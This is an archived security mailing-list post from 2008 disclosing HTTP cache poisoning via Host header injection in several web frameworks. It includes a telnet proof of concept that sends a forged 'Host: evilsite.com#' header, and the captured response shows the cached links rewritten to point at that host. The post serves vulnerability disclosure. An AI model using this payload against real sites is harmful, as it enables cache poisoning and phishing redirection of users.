[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[WEB SECURITY] HTTP cache poisoning via Host header injection
- From: Carlos <carlos@xxxxxxxxx>
- Subject: [WEB SECURITY] HTTP cache poisoning via Host header injection
- Date: Thu, 12 Jun 2008 11:40:42 -0700
I've confirmed this in default installations of a few web frameworks
including Rails, Zope and WordPress.
The basic vulnerability comes when:
1) Your web server does not validate the Host header
2) Your code or your framework uses the Host header value to build links
3) You employ page or fragment caching
There may be phishing-type exploits possible even if a site does not
do 3), if there are caching proxies at the ISP level.
$ telnet www.example.com 80
Trying 1.2.3.4...
Connected to www.example.com.
Escape character is '^]'.
GET /foo/bar.html HTTP/1.1
User-Agent: Mozilla
Host: evilsite.com#
HTTP/1.1 200 OK
Date: Wed, 10 Jun 2008 00:27:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Wed, 17 Jun 2008 00:27:45 GMT
Content-Length: 2959
Content-Type: text/html; charset=iso-8859-1
<html>
<head>
<title>Foo : Bar</title>
</head>
<body>
<a href="http://evilsite.com#/";>Home</a>
<a href="http://evilsite.com#/about";>About</a>
<a href="http://evilsite.com#/login";>Login</a>
[...snip...]
<hr>
<address>Apache Server at evilsite.com# Port 80</address>
</body></html>
Some more details here:
http://carlos.bueno.org/2008/06/host-header-injection.html
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
Search this site
|